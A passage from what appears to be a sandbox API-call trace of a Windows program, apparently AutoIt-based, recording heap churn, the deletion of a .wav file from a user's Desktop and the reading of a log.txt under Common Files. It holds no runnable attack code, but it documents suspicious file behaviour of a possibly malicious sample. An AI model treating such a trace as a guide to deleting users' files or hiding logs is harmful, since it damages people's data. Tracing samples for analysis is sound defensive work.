returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.056] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.056] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.056] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav", lpFilePart=0x0) returned 0x3b [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5742c440, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xe91d5530, ftLastAccessTime.dwHighDateTime=0x1d5c009, ftLastWriteTime.dwLowDateTime=0x11cd3840, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xeb65, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="kYfCsY7fw675g46j6.wav", cAlternateFileName="KYFCSY~1.WAV")) returned 0x7c2100 [0030.057] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kyfcsy7fw675g46j6.wav")) returned 1 [0030.058] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5742c440, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xe91d5530, ftLastAccessTime.dwHighDateTime=0x1d5c009, ftLastWriteTime.dwLowDateTime=0x11cd3840, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xeb65, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="kYfCsY7fw675g46j6.wav", cAlternateFileName="KYFCSY~1.WAV")) returned 0 [0030.058] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.058] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0030.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.059] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0030.060] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.061] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.062] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.062] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.063] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.064] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.064] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.064] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.064] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.064] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.064] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.064] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.064] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x260, lpOverlapped=0x0) returned 1 [0030.064] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.064] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.064] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.065] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.065] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 